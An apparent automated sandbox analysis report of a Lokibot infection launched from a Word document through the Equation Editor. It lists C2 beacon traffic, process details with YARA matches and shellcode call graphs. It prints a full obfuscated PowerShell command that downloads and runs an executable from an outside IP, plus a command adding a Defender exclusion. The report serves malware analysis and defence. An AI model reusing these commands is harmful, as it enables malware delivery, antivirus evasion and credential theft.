                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    107192.168.2.224927094.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:10:02.336374998 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:10:02.341418982 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:10:03.218589067 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:10:03 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    108192.168.2.224927194.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:10:03.574256897 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:10:03.579344034 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:10:04.453927994 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:10:04 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    109192.168.2.224927294.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:10:04.608426094 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:10:04.613404989 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:10:05.503791094 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:10:05 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    110192.168.2.224927394.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:10:05.648680925 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:10:05.653629065 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:10:06.403878927 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:10:06 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:05:07:55
                                                    Start date:20/11/2024
                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                    Imagebase:0x13f4e0000
                                                    File size:1'423'704 bytes
                                                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:05:07:56
                                                    Start date:20/11/2024
                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                    Imagebase:0x400000
                                                    File size:543'304 bytes
                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:05:08:00
                                                    Start date:20/11/2024
                                                    Path:C:\Windows\SysWOW64\mshta.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta"
                                                    Imagebase:0x1070000
                                                    File size:13'312 bytes
                                                    MD5 hash:ABDFC692D9FE43E2BA8FE6CB5A8CB95A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:05:08:02
                                                    Start date:20/11/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
                                                    Imagebase:0xb10000
                                                    File size:427'008 bytes
                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:05:08:03
                                                    Start date:20/11/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt
                                                    Imagebase:0xb10000
                                                    File size:427'008 bytes
                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:10
                                                    Start time:05:08:06
                                                    Start date:20/11/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.cmdline"
                                                    Imagebase:0xfa0000
                                                    File size:2'140'808 bytes
                                                    MD5 hash:F8F36858B9405FBE27377FD7E8FEC2F2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:05:08:06
                                                    Start date:20/11/2024
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4441.tmp" "c:\Users\user\AppData\Local\Temp\4vzopkvk\CSC2CE1E80E8DFB46C4BC398124C902BE0.TMP"
                                                    Imagebase:0x170000
                                                    File size:46'832 bytes
                                                    MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:13
                                                    Start time:05:08:12
                                                    Start date:20/11/2024
                                                    Path:C:\Users\user\AppData\Roaming\wininit.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Roaming\wininit.exe"
                                                    Imagebase:0x13e0000
                                                    File size:600'576 bytes
                                                    MD5 hash:66B03D1AFF27D81E62B53FC108806211
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000D.00000002.393313668.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000D.00000002.393313668.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.393313668.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000D.00000002.393313668.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000D.00000002.393313668.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000D.00000002.393313668.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000D.00000002.393313668.0000000003881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000D.00000002.393313668.0000000003881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.393313668.0000000003881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000D.00000002.393313668.0000000003881000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000D.00000002.393313668.0000000003881000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000D.00000002.393313668.0000000003881000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:05:08:13
                                                    Start date:20/11/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"
                                                    Imagebase:0xb10000
                                                    File size:427'008 bytes
                                                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:05:08:13
                                                    Start date:20/11/2024
                                                    Path:C:\Users\user\AppData\Roaming\wininit.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Roaming\wininit.exe"
                                                    Imagebase:0x13e0000
                                                    File size:600'576 bytes
                                                    MD5 hash:66B03D1AFF27D81E62B53FC108806211
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 0000000F.00000002.626819523.0000000000524000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Loki_1, Description: Loki Payload, Source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                    Reputation:low
                                                    Has exited:false

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:18.2%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:50%
                                                      Total number of Nodes:110
                                                      Total number of Limit Nodes:5
                                                      execution_graph 566 3540484 567 3540486 566->567 570 3540499 LoadLibraryW 567->570 585 35404b3 570->585 574 35404c4 URLDownloadToFileW 599 3540587 574->599 580 3540596 ShellExecuteW 614 35405c1 580->614 582 354048b 583 35405b5 583->582 584 35405c4 ExitProcess 583->584 586 35404b6 585->586 587 354056e 8 API calls 586->587 588 35404c4 URLDownloadToFileW 587->588 590 3540587 5 API calls 588->590 591 3540577 590->591 592 354059c 3 API calls 591->592 593 354058e 592->593 594 3540596 ShellExecuteW 593->594 596 35404a0 593->596 595 35405c1 ExitProcess 594->595 597 35405b5 595->597 596->574 616 354056e URLDownloadToFileW 596->616 597->596 598 35405c4 ExitProcess 597->598 600 3540589 599->600 601 354058e 600->601 602 354059c 3 API calls 600->602 603 3540596 ShellExecuteW 601->603 605 3540577 601->605 602->601 604 35405c1 ExitProcess 603->604 606 35405b5 604->606 608 354059c 605->608 606->605 607 35405c4 ExitProcess 606->607 609 354059f ShellExecuteW 608->609 610 35405c1 ExitProcess 609->610 611 35405b5 609->611 610->611 612 35405c4 ExitProcess 611->612 613 354058e 611->613 613->580 613->582 615 35405c4 ExitProcess 614->615 617 3540577 616->617 618 3540587 5 API calls 616->618 619 354059c 3 API calls 617->619 618->617 620 354058e 619->620 621 3540596 ShellExecuteW 620->621 623 35405fb 620->623 622 35405c1 ExitProcess 621->622 624 35405b5 622->624 623->574 624->623 625 35405c4 ExitProcess 624->625 628 3540055 629 3540068 628->629 630 3540091 629->630 633 354010c 629->633 642 3540101 630->642 652 354039a ExitProcess 633->652 643 3540111 642->643 644 354039a 16 API calls 643->644 645 3540388 644->645 659 35403b3 645->659 653 35403a6 652->653 654 35403b3 15 API calls 652->654 655 35403cf 15 API calls 653->655 654->653 656 35403c0 655->656 657 3540408 656->657 658 3540484 15 API calls 656->658 658->657 660 35403b9 659->660 661 35403c0 660->661 665 35403cf 660->665 664 3540408 661->664 671 3540484 661->671 666 35403d5 665->666 675 35403f6 666->675 672 3540486 671->672 673 3540499 15 API calls 672->673 674 354048b 673->674 676 35403f9 675->676 677 3540484 15 API calls 676->677 678 3540408 677->678 679 35400c5 680 354007c 679->680 682 3540091 680->682 684 354010c 680->684 681 3540101 16 API calls 683 35400fd 681->683 682->681 682->682 685 354039a 16 API calls 684->685 686 3540388 685->686 687 35403b3 15 API calls 686->687 688 35403a6 687->688 689 35403cf 15 API calls 688->689 690 35403c0 689->690 691 3540408 690->691 692 3540484 15 API calls 690->692 692->691 693 3540351 694 35403a6 693->694 695 35403b3 15 API calls 693->695 696 35403cf 15 API calls 694->696 695->694 697 35403c0 696->697 698 3540408 697->698 699 3540484 15 API calls 697->699 699->698 626 35405c8 GetPEB 627 35405d6 626->627 700 354011a 701 3540111 700->701 702 354039a 16 API calls 701->702 703 3540388 702->703 704 35403b3 15 API calls 703->704 705 35403a6 704->705 706 35403cf 15 API calls 705->706 707 35403c0 706->707 708 3540408 707->708 709 3540484 15 API calls 707->709 709->708

                                                      Callgraph

                                                      • Executed
                                                      • Not Executed
                                                      • Opacity -> Relevance
                                                      • Disassembly available
                                                      callgraph 0 Function_035401D4 1 Function_03540055 7 Function_035403B3 1->7 11 Function_0354039A 1->11 13 Function_03540484 1->13 19 Function_03540101 1->19 21 Function_035403CF 1->21 2 Function_035403F6 2->13 3 Function_035405F0 4 Function_03540351 4->7 4->13 4->21 5 Function_03540272 6 Function_035404B3 8 Function_0354059C 6->8 15 Function_03540587 6->15 17 Function_035405C1 6->17 20 Function_0354056E 6->20 7->13 18 Function_03540641 7->18 7->21 8->17 9 Function_035400FF 10 Function_03540499 10->6 10->8 10->15 10->17 10->20 11->7 11->13 11->21 12 Function_0354011A 12->7 12->11 12->13 12->21 13->10 14 Function_035400C5 14->7 14->11 14->13 14->19 14->21 15->8 15->17 16 Function_03540000 19->7 19->11 19->13 19->21 20->8 20->15 20->17 21->2 21->13 21->18 22 Function_035405C8 22->3 23 Function_035401C8

                                                      Control-flow Graph

                                                      APIs
                                                      • LoadLibraryW.KERNEL32(0354048B), ref: 03540499
                                                        • Part of subcall function 035404B3: URLDownloadToFileW.URLMON(00000000,035404C4,?,00000000,00000000), ref: 03540570
                                                        • Part of subcall function 035404B3: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035405AE
                                                      • ExitProcess.KERNEL32(00000000), ref: 035405C6
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.360002424.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                                      • String ID:
                                                      • API String ID: 2508257586-0
                                                      • Opcode ID: 33e07834c61a3b4a4d1bff4faa627a9e062eb90e656a724115017dc80b3cc87b
                                                      • Instruction ID: b8aee7ce726316fcf25bae1294ac897ab05840c9f23147c74b97d037de61e4aa
                                                      • Opcode Fuzzy Hash: 33e07834c61a3b4a4d1bff4faa627a9e062eb90e656a724115017dc80b3cc87b
                                                      • Instruction Fuzzy Hash: E4413DE294C3C12BD71AD7746C6D694FF64BA63108F6D8ACE92C60B4F3E3988100C756

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 50 35404b3-3540594 call 354056e URLDownloadToFileW call 3540587 call 354059c 74 3540596-35405b8 ShellExecuteW call 35405c1 50->74 75 35405fb-3540607 50->75 77 354060a 74->77 85 35405ba 74->85 75->77 78 3540612-3540616 77->78 79 354060c-3540610 77->79 82 3540618-354061c 78->82 83 354062b-354062d 78->83 79->78 81 354061e-3540625 79->81 87 3540627 81->87 88 3540629 81->88 82->81 82->83 86 354063d-354063e 83->86 85->83 90 35405bc-35405c6 ExitProcess 85->90 87->83 89 354062f-3540638 88->89 93 3540601-3540604 89->93 94 354063a 89->94 93->89 96 3540606 93->96 94->86 96->77
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.360002424.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: DownloadExecuteExitFileProcessShell
                                                      • String ID:
                                                      • API String ID: 3584569557-0
                                                      • Opcode ID: d5a93389f758dc0731de51870d7bc158146041aee29c1b6709a8f8bd08986ff1
                                                      • Instruction ID: c3f18fd9f45c77427a6ffc6e0b1d1e48370fc2512670d2110c78e4fce8553971
                                                      • Opcode Fuzzy Hash: d5a93389f758dc0731de51870d7bc158146041aee29c1b6709a8f8bd08986ff1
                                                      • Instruction Fuzzy Hash: 1C310CE294D3D21FD71AD7746C6D694FF64BE62108F6D8ACE92C60B8E3E3988100C752

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 97 354056e-3540570 URLDownloadToFileW 98 3540577-3540594 call 354059c 97->98 99 3540572 call 3540587 97->99 103 3540596-35405b8 ShellExecuteW call 35405c1 98->103 104 35405fb-3540607 98->104 99->98 106 354060a 103->106 114 35405ba 103->114 104->106 107 3540612-3540616 106->107 108 354060c-3540610 106->108 111 3540618-354061c 107->111 112 354062b-354062d 107->112 108->107 110 354061e-3540625 108->110 116 3540627 110->116 117 3540629 110->117 111->110 111->112 115 354063d-354063e 112->115 114->112 119 35405bc-35405c6 ExitProcess 114->119 116->112 118 354062f-3540638 117->118 122 3540601-3540604 118->122 123 354063a 118->123 122->118 125 3540606 122->125 123->115 125->106
                                                      APIs
                                                      • URLDownloadToFileW.URLMON(00000000,035404C4,?,00000000,00000000), ref: 03540570
                                                        • Part of subcall function 03540587: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035405AE
                                                        • Part of subcall function 03540587: ExitProcess.KERNEL32(00000000), ref: 035405C6
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.360002424.0000000003540000.00000004.00000020.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_3540000_EQNEDT32.jbxd
                                                      Similarity
                                                      • API ID: DownloadExecuteExitFileProcessShell
                                                      • String ID:
                                                      • API String ID: 3584569557-0
                                                      • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                      • Instruction ID: a47ea03b5dfff677a335c339a4f3d244734eb88c0ec0d64fa7f90b3da448de43
                                                      • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                      • Instruction Fuzzy Hash: 56F0B4B158D34129E619F774AC59FAAEE68FFC1708F340489B3424F0F2D58484008659

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
